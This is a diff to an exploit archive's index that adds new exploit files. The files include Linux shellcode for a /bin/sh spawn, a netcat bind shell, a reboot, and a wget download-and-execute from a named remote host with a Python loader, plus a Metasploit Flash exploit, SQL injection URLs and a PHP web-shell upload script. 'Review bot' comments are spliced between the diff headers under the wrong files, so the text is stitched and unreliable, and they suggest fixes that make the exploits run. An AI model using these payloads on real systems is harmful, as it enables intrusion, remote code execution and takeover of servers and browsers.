diff --git a/files.csv b/files.csv
index 5ca0a8e9b..627ac1d6e 100755
--- a/files.csv
+++ b/files.csv
@@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
-37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
+37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@@ -33612,6 +33612,10 @@ id,file,description,date,author,platform,type,port
 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin index.php id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
+37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
+37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS 'car-details.php' SQL Injection Vulnerability",2012-06-03,Am!r,php,webapps,0
+37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 'doupload.php' Arbitrary File Upload Vulnerability",2015-06-05,"Sammy FORGIT",php,webapps,0
 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
@@ -33670,6 +33674,7 @@ id,file,description,date,author,platform,type,port
 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
 37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
+37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x 'main_bigware_54.php' SQL Injection Vulnerability",2012-06-05,rwenzel,php,webapps,0
 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (21 bytes) (2)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
@@ -33691,13 +33696,30 @@ id,file,description,date,author,platform,type,port 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0 +37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) - 29 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 - 60 bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 'member.php' SQL Injection Vulnerability",2012-06-06,MR.XpR,php,webapps,0 +37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 'option' Parameter Information Disclosure Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0 +37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 'vw_upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0 37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 'nsextt' Parameter Cross Site Scripting Vulnerability",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 
admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 +37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0 +37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 +37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80 37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0 37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0 +37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 +37362,platforms/lin_x86-64/shellcode/37362.c,"linux/x86-64 execve(/bin/sh) 30 bytes",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 +37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities",2015-06-24,cfreer,php,webapps,80 +37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 +37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 Downloand & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 Reboot - 28 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage 
Win32k Exploit",2015-06-24,metasploit,windows,local,0
+37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
+37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/lin_x86-64/shellcode/37362.c b/platforms/lin_x86-64/shellcode/37362.c
new file mode 100755
index 000000000..716da04ca
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/37362.c
@@ -0,0 +1,33 @@
+/*
+William Borskey 2015
+Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm.
+
+ 1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
+ 2 BITS 64
+ 3
+ 4 section .text
+ 5 global start
+ 6
+ 7 start:
+ 8 mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in
+ 9 ;little endian byte order into rcx padded with 11
+ 10 shl rcx, 0x08 ;left shift to trim off the two bytes of padding
+ 11 shr rcx, 0x08 ;ringht shift to re order string
+ 12 push rcx ;push the immediate value stored in rcx onto the stack
+ 13 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi
+ 14 xor rdx, rdx ;zero out rdx for an execve argument
+ 15 mov al, 0x3b ;move 0x3b (execve sycall) into al to avoid nulls
+ 16 syscall ;make the syscall
+*/
+
+char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05";
+
+int main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int (*)()) shellcode;
+ (int)(*func)();
+ return 0;
+}
+
+
diff --git a/platforms/lin_x86/shellcode/37358.c b/platforms/lin_x86/shellcode/37358.c
new file mode 100755
index 000000000..73515536f
--- /dev/null
+++ b/platforms/lin_x86/shellcode/37358.c
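Review bot: The comment on listing line 13 (`lea rdi, [rsp] ;load the address of the string that is on the stack into rsi`) names the wrong register: the instruction writes rdi, so the comment should read `;load the address of the string on the stack into rdi`. Listing line 11 has `ringht shift` for right shift, and the build command and the yasm sentence appear to be run together on one line (`-z execstack Shellcode written ...`); a line break after `execstack` would separate the compile instructions from the description. In `main`, `(int)(*func)();` casts a discarded return value and has no effect; `func();` reads the same.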
@@ -0,0 +1,42 @@
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+
+
+#Auxiliary tools (50% time gain !)
+#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
+#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/ASMtoShellcode.py
+
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060: 31 c0 xor %eax,%eax
+ 8048062: 50 push %eax
+ 8048063: 68 48 41 43 4b push $0x4b434148 #You can change it !
+ 8048068: b0 27 mov $0x27,%al
+ 804806a: 89 e3 mov %esp,%ebx
+ 804806c: 66 41 inc %cx
+ 804806e: cd 80 int $0x80
+ 8048070: b0 0f mov $0xf,%al
+ 8048072: 66 b9 ff 01 mov $0x1ff,%cx
+ 8048076: cd 80 int $0x80
+ 8048078: 31 c0 xor %eax,%eax
+ 804807a: 40 inc %eax
+ 804807b: cd 80 int $0x80
+
+
+#include
+#include
+
+char *shellcode =
+"\x31\xc0\x50\x68\x48\x41\x43\x4b\xb0\x27\x89\xe3\x66\x41\xcd\x80\xb0\x0f\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80";
+
+
+//First push always start with byte 68.Also mov b0.
+//Than just push your string between byte 68 - b0 ! :)
+//Here it is -> \x68 "\x48\x41\x43\x4b\" xb0 GOODLUCK !
+
+
+int main(void){
+ fprintf(stdout,"Length: %d\n",strlen(shellcode));
+ (*(void(*)()) shellcode)();}
diff --git a/platforms/lin_x86/shellcode/37359.c b/platforms/lin_x86/shellcode/37359.c
new file mode 100755
index 000000000..1af3adca4
--- /dev/null
+++ b/platforms/lin_x86/shellcode/37359.c
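Review bot: The file is not a compilable translation unit as committed: the `#Greetz`/`#Author` header, the tool links and the objdump listing sit outside any comment, so the preprocessor fails on `#Greetz` before reaching the code; wrapping everything above the `#include` lines in a `/* ... */` block fixes that. Both `#include` lines show no header name on this page (presumably `<stdio.h>` and `<string.h>`, which `fprintf` and `strlen` need); if that is the committed content rather than a rendering artifact, the names must be restored. `fprintf(stdout,"Length: %d\n",strlen(shellcode))` passes a `size_t` to `%d`; `%zu` is the matching conversion. The same three points apply to 37359.c and 37366.c in this commit.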
@@ -0,0 +1,54 @@
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+#Concat : Do not disturb - Bomberman
+
+
+#Netcat openbsd version (which is default installed in ubuntu) have
+not "-e" option.
+#So if you are trying to test on ubuntu(like me) you must change
+version to traditional.
+
+#Typing this:
+ #1) sudo update-alternatives --config nc
+ #2) Select the option /bin/nc.traditional
+
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060: 31 c0 xor %eax,%eax
+ 8048062: 50 push %eax
+ 8048063: 68 6e 2f 6e 63 push $0x636e2f6e
+ 8048068: 68 2f 2f 62 69 push $0x69622f2f
+ 804806d: 89 e3 mov %esp,%ebx
+ 804806f: 50 push %eax
+ 8048070: 68 35 35 35 35 push $0x35353535 #PORT
+ 8048075: 68 2d 6c 74 70 push $0x70746c2d
+ 804807a: 89 e1 mov %esp,%ecx
+ 804807c: 50 push %eax
+ 804807d: 68 2f 2f 73 68 push $0x68732f2f
+ 8048082: 68 2f 62 69 6e push $0x6e69622f
+ 8048087: 68 2d 65 2f 2f push $0x2f2f652d
+ 804808c: 89 e2 mov %esp,%edx
+ 804808e: 50 push %eax
+ 804808f: 52 push %edx
+ 8048090: 51 push %ecx
+ 8048091: 53 push %ebx
+ 8048092: 89 e7 mov %esp,%edi
+ 8048094: b0 0b mov $0xb,%al
+ 8048096: 89 f9 mov %edi,%ecx
+ 8048098: 31 d2 xor %edx,%edx
+ 804809a: cd 80 int $0x80
+
+#include
+#include
+
+char *loveme = "\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x35\x35\x35"
+ "\x35\x68\x2d\x6c\x74\x70\x89\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68"
+ "\x2d\x65\x2f\x2f\x89\xe2\x50\x52\x51\x53\x89\xe7\xb0\x0b\x89\xf9\x31\xd2\xcd\x80";
+
+// "\x68-----\x35\x35\x35\x35\-------x68\" There port change however you like.
+
+int main(void){
+ fprintf(stdout,"Length: %d\n",strlen(loveme));
+ (*(void(*)()) loveme)();}
diff --git a/platforms/lin_x86/shellcode/37365.c b/platforms/lin_x86/shellcode/37365.c
new file mode 100755
index 000000000..5339d3b7f
--- /dev/null
+++ b/platforms/lin_x86/shellcode/37365.c
@@ -0,0 +1,129 @@
+Linux/x86 Downloand&Execute
+
+
+------WE ARE BOMBERMANS----
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+#Just the two of us LOL.
+
+
+Info!
+ This shellcode has two part.Because when using fork in asm, ocurrs problems in shellcode.
+ So you can use multiprocessing to do this.
+ If you dont want problem while running shellcodes.
+ I did not calculate len bytes.Because its completely depend url length.
+
+ TESTED ON : Ubuntu 14.04
+
+
+/*
+The NX Bit prevents random data being executed on modern processors and OSs.
+To get around it, call mprotect.
+You should also define your shellcode as a binary instead of a character string.
+
+-By Philipp Hagemeister
+
+Emmy goes to Philipp Hagemeister ! ! (clap clap clap clap)
+Special thanks :) ..
+*/
+
+;https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
+;Use it convert string to stack.
+
+
+#Remote file download#
+
+08048060 <.text>:
+ 8048060: 31 c0 xor %eax,%eax
+ 8048062: 50 push %eax
+ 8048063: 68 68 65 6c 6c push $0x6c6c6568
+ 8048068: 68 62 34 6d 2f push $0x2f6d3462
+ 804806d: 68 2f 62 33 6d push $0x6d33622f
+ 8048072: 68 6d 2f 2f 2f push $0x2f2f2f6d
+ 8048077: 68 73 2e 63 6f push $0x6f632e73
+ 804807c: 68 78 69 6d 61 push $0x616d6978
+ 8048081: 68 33 2e 6d 65 push $0x656d2e33 ;3.meximas.com/b3mb4m/hell
+ 8048086: 89 e1 mov %esp,%ecx
+ 8048088: 50 push %eax
+ 8048089: 68 77 67 65 74 push $0x74656777
+ 804808e: 68 62 69 6e 2f push $0x2f6e6962
+ 8048093: 68 75 73 72 2f push $0x2f727375
+ 8048098: 68 2f 2f 2f 2f push $0x2f2f2f2f
+ 804809d: 89 e3 mov %esp,%ebx
+ 804809f: 50 push %eax
+ 80480a0: 50 push %eax
+ 80480a1: 51 push %ecx
+ 80480a2: 53 push %ebx
+ 80480a3: 89 e1 mov %esp,%ecx
+ 80480a5: b0 0b mov $0xb,%al
+ 80480a7: cd 80 int $0x80
+ 80480a9: 31 c0 xor %eax,%eax
+ 80480ab: fe c0 inc %al
+ 80480ad: cd 80 int $0x80
+
+
+#Download&Chmod777&Execute
+
+08048060 <.text>:
+ 8048060: 31 c0 xor %eax,%eax
+ 8048062: 31 c9 xor %ecx,%ecx
+ 8048064: 50 push %eax
+ 8048065: 68 68 
65 6c 6c push $0x6c6c6568 ;file name(hell)
+ 804806a: b0 0f mov $0xf,%al
+ 804806c: 89 e3 mov %esp,%ebx
+ 804806e: 66 b9 ff 01 mov $0x1ff,%cx
+ 8048072: cd 80 int $0x80
+ 8048074: 31 c0 xor %eax,%eax
+ 8048076: 50 push %eax
+ 8048077: 89 e2 mov %esp,%edx
+ 8048079: 53 push %ebx
+ 804807a: 89 e1 mov %esp,%ecx
+ 804807c: b0 0b mov $0xb,%al
+ 804807e: cd 80 int $0x80
+
+
+
+Than lets back python.
+
+
+#!/usr/bin/python
+
+import ctypes
+import multiprocessing
+import time
+
+
+def download(firstone="Capture"):
+ if firstone != "Capture":
+ #Download codes.
+ shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\x68\x62\x34\x6d\x2f\x68\x2f\x62"
+ b"\x33\x6d\x68\x6d\x2f\x2f\x2f\x68\x73\x2e\x63\x6f\x68\x78\x69\x6d\x61\x68\x33\x2e"
+ b"\x6d\x65\x89\xe1\x50\x68\x77\x67\x65\x74\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f"
+ b"\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xfe"
+ b"\xc0\xcd\x80")
+ else:
+ time.sleep(30)#Time delay, depend ur file size.
+ shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\xb0\x0f\x89\xe3\x66\xb9\xff\x01"
+ b"\xcd\x80\x31\xc0\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
+ #Chomd777 and execute it.
+ shellcode = ctypes.c_char_p(shellcode_data)
+ function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
+
+ addr = ctypes.cast(function, ctypes.c_void_p).value
+ libc = ctypes.CDLL('libc.so.6')
+ pagesize = libc.getpagesize()
+ addr_page = (addr // pagesize) * pagesize
+ for page_start in range(addr_page, addr + len(shellcode_data), pagesize):
+ assert libc.mprotect(page_start, pagesize, 0x7) == 0
+ function()
+
+
+for x in xrange(0, 2):
+ if x == 0:
+ first = multiprocessing.Process(target=download, args=("KnockKnock",))
+ else:
+ first = multiprocessing.Process(target=download)
+ first.start()
+
+
+#Bomberman Team presented !!
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/37366.c b/platforms/lin_x86/shellcode/37366.c
new file mode 100755
index 000000000..4be8eae2e
--- /dev/null
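Review bot: The file is committed as `37365.c` but nothing in it is C: the runnable part is a Python 2 script (`#!/usr/bin/python`, `xrange`), preceded by free-form notes, a `/* */` block and two objdump listings that neither a C nor a Python parser accepts, so it cannot be executed as checked in; a `.py` name with the notes moved into `#` comments would match what the files.csv entry describes. In `download`, `assert libc.mprotect(page_start, pagesize, 0x7) == 0` is the only check that the remap succeeded, and it disappears under `python -O`; an explicit check, `if libc.mprotect(page_start, pagesize, 0x7) != 0: raise OSError("mprotect failed")`, keeps it. The header notes should also state that the first shellcode embeds a fixed remote host and path (the listing comment gives `3.meximas.com/b3mb4m/hell`), since running the sample fetches and executes whatever that host serves, and that the 30-second `time.sleep` in the second process is tuned to that download.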
+++ b/platforms/lin_x86/shellcode/37366.c
@@ -0,0 +1,34 @@
+Linux/x86 Reboot - 28Bytes
+
+
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+#Tested ON : Ubuntu 14.04
+
+
+08048060 <.text>:
+ 8048060: 31 c0 xor %eax,%eax
+ 8048062: 50 push %eax
+ 8048063: 68 62 6f 6f 74 push $0x746f6f62
+ 8048068: 68 6e 2f 72 65 push $0x65722f6e
+ 804806d: 68 2f 73 62 69 push $0x6962732f
+ 8048072: 89 e3 mov %esp,%ebx
+ 8048074: 50 push %eax
+ 8048075: 53 push %ebx
+ 8048076: 89 e1 mov %esp,%ecx
+ 8048078: b0 0b mov $0xb,%al
+ 804807a: cd 80 int $0x80
+
+
+
+#include
+#include
+
+char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e\x2f\x72\x65"
+"\x68\x2f\x73\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+
+int main(void){
+ fprintf(stdout,"Length: %d\n",strlen(shellcode));
+ (*(void(*)()) shellcode)();
+}
diff --git a/platforms/multiple/remote/37368.rb b/platforms/multiple/remote/37368.rb
new file mode 100755
index 000000000..bd19d1d36
--- /dev/null
+++ b/platforms/multiple/remote/37368.rb
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
+ Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
+ same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
+ of the ShaderJob after starting the job it's possible to create a buffer overflow condition
+ where the size of the destination buffer and the length of the copy are controlled. This
+ module has been tested successfully on:
+ * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
+ * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
+ * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
+ * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Chris Evans', # Vulnerability discovery
+ 'Unknown', # Exploit in the wild
+ 'juan vazquez' # msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2015-3090'],
+ ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
+ ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
+ ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => ['win', 'linux'],
+ 'Arch' => [ARCH_X86],
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :arch => ARCH_X86,
+ :os_name => lambda do |os|
+ os =~ OperatingSystems::Match::LINUX ||
+ os =~ OperatingSystems::Match::WINDOWS_7 ||
+ os =~ OperatingSystems::Match::WINDOWS_81
+ end,
+ :ua_name => lambda do |ua|
+ case target.name
+ when 'Windows'
+ return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+ when 'Linux'
+ return true if ua == Msf::HttpClients::FF
+ end
+
+ false
+ end,
+ :flash => lambda do |ver|
+ case target.name
+ when 'Windows'
+ return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
+ when 'Linux'
+ return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
+ end
+
+ false
+ end
+ },
+ 'Targets' =>
+ [
+ [ 'Windows',
+ {
+ 'Platform' => 'win'
+ }
+ ],
+ [ 'Linux',
+ {
+ 'Platform' => 'linux'
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'May 12 2015',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 
'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + b64_payload = Rex::Text.encode_base64(target_payload) + os_name = target_info[:os_name] + + if target.name =~ /Windows/ + platform_id = 'win' + elsif target.name =~ /Linux/ + platform_id = 'linux' + end + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end +end \ No newline at end of file diff --git a/platforms/php/webapps/37350.txt b/platforms/php/webapps/37350.txt new file mode 100755 index 000000000..444901ff9 --- /dev/null +++ b/platforms/php/webapps/37350.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53764/info + +AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +AdaptCMS 2.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5-- \ No newline at end of file diff --git a/platforms/php/webapps/37351.txt b/platforms/php/webapps/37351.txt new file mode 100755 index 000000000..95979926e --- /dev/null +++ b/platforms/php/webapps/37351.txt 
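Review bot: In `create_swf`, `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns the same variable from inside and outside the block; the block's value is already the file contents, so the whole method reduces to `::File.binread(path)`. In `exploit_template`, `platform_id` is set only when `target.name` matches `/Windows/` or `/Linux/`; that holds for the two declared targets, but reading it from the target's `'Platform'` entry (`target['Platform']`) would keep it tied to the `Targets` table rather than to the display name. The `html_template` body is empty on this page, which looks like a rendering artifact rather than the committed content; if it is what was committed, the module serves an empty page after `Sending HTML...`.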
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53764/info
+
+AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]
\ No newline at end of file
diff --git a/platforms/php/webapps/37352.txt b/platforms/php/webapps/37352.txt
new file mode 100755
index 000000000..82d71c8ee
--- /dev/null
+++ b/platforms/php/webapps/37352.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53771/info
+
+Ignite Solutions CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/car-details.php?ID=[Sql]
\ No newline at end of file
diff --git a/platforms/php/webapps/37353.php b/platforms/php/webapps/37353.php
new file mode 100755
index 000000000..801aa7412
--- /dev/null
+++ b/platforms/php/webapps/37353.php
@@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/53790/info + +The Nmedia WordPress Member Conversation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +Nmedia WordPress Member Conversation 1.35.0 is vulnerable; other versions may also be affected. + +"@$uploadfile", + 'folder'=>"/test/")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; + +?> + +Shell Access : +http://www.exemple.com/wordpress/wp-content/uploads/user_uploads/test/lo.php + +lo.php + \ No newline at end of file diff --git a/platforms/php/webapps/37354.py 